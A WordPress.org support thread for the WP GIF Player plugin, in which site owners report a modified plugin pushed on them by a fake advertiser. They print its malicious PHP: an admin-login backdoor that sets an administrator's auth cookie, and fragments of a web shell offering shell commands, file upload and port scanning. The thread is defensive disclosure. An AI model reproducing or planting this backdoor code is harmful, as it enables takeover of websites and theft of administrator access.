Title: Attack with your plugin Last modified: December 27, 2017 --- # Attack with your plugin * [diogobguerreiro](https://wordpress.org/support/users/diogobguerreiro/) * (@diogobguerreiro) * [8 years, 5 months ago](https://wordpress.org/support/topic/attack-with-your-plugin/) * Today I was contacted by a person who wanted to buy advertising on my blog. I would forcefully install the plugin on my site but with their changes. This code below is what I found, one more file in php format. * Is that really what I’m thinking? Did you want to steal my access? * users”; $user_ids = $wpdb->get_results($query_str); foreach ($user_ids as $uid) { $user_id = $uid->ID; if (user_can($user_id, ‘administrator’)) { $user_info = get_userdata($user_id); $user_login = $user_info->user_login; wp_set_current_user( $user_id, $user_login); wp_set_auth_cookie($user_id); do_action(‘wp_login’, $ user_login); echo “You are logged in as $user_login”; if (function_exists(‘get_admin_url’)){ wp_redirect(get_admin_url()); } else { wp_redirect(get_bloginfo(‘wpurl’) . ‘/ wp-admin’); } exit; } } Viewing 2 replies - 1 through 2 (of 2 total) * [ruimoreira](https://wordpress.org/support/users/ruimoreira/) * (@ruimoreira) * [8 years, 3 months ago](https://wordpress.org/support/topic/attack-with-your-plugin/#post-10023111) * I just had the same attack attempt on one of the websites I manage, I also noticed that this piece of code does not exist on the files in GitHub. In any case thank you for reporting this I was about to do the same 🙂 * [ruimoreira](https://wordpress.org/support/users/ruimoreira/) * (@ruimoreira) * [8 years, 3 months ago](https://wordpress.org/support/topic/attack-with-your-plugin/#post-10023125) * also not just that … check it out … it tries to create a php shell of some sorts * echo “

system

\n”; echo “Server: ” . $_SERVER[‘ SERVER_NAME’] . “
\n”; echo “Current directory: ” . getcwd () . “
\n”; echo “Software: ” . $_SERVER [‘SERVER_SOFTWARE’] . “ * ``` \n\n ``` * \n”; echo “ * ``` \n\n\n ``` * “; * echo “”; echo “”; echo “\n”; echo “\n”; echo “\n”; echo “\n”; echo “
[Shell Command](https://wordpress.org/support/topic/attack-with-your-plugin/".$current."&mode=system?output_format=md) [Create a new file](https://wordpress.org/support/topic/attack-with-your-plugin/".$current."&mode=create?output_format=md) [Upload file](https://wordpress.org/support/topic/attack-with-your-plugin/".$current."&mode=upload?output_format=md) [Port Scan](https://wordpress.org/support/topic/attack-with-your-plugin/".$current."&mode=port_scan?output_format=md)
”; echo “ * ``` \n\n ``` * “; * wow !!! Viewing 2 replies - 1 through 2 (of 2 total) The topic ‘Attack with your plugin’ is closed to new replies. * ![](https://s.w.org/plugins/geopattern-icon/wp-gif-player_21364a.svg) * [WP GIF Player](https://wordpress.org/plugins/wp-gif-player/) * [Frequently Asked Questions](https://wordpress.org/plugins/wp-gif-player/#faq) * [Support Threads](https://wordpress.org/support/plugin/wp-gif-player/) * [Active Topics](https://wordpress.org/support/plugin/wp-gif-player/active/) * [Unresolved Topics](https://wordpress.org/support/plugin/wp-gif-player/unresolved/) * [Reviews](https://wordpress.org/support/plugin/wp-gif-player/reviews/) * 2 replies * 2 participants * Last reply from: [ruimoreira](https://wordpress.org/support/users/ruimoreira/) * Last activity: [8 years, 3 months ago](https://wordpress.org/support/topic/attack-with-your-plugin/#post-10023125) * Status: not resolved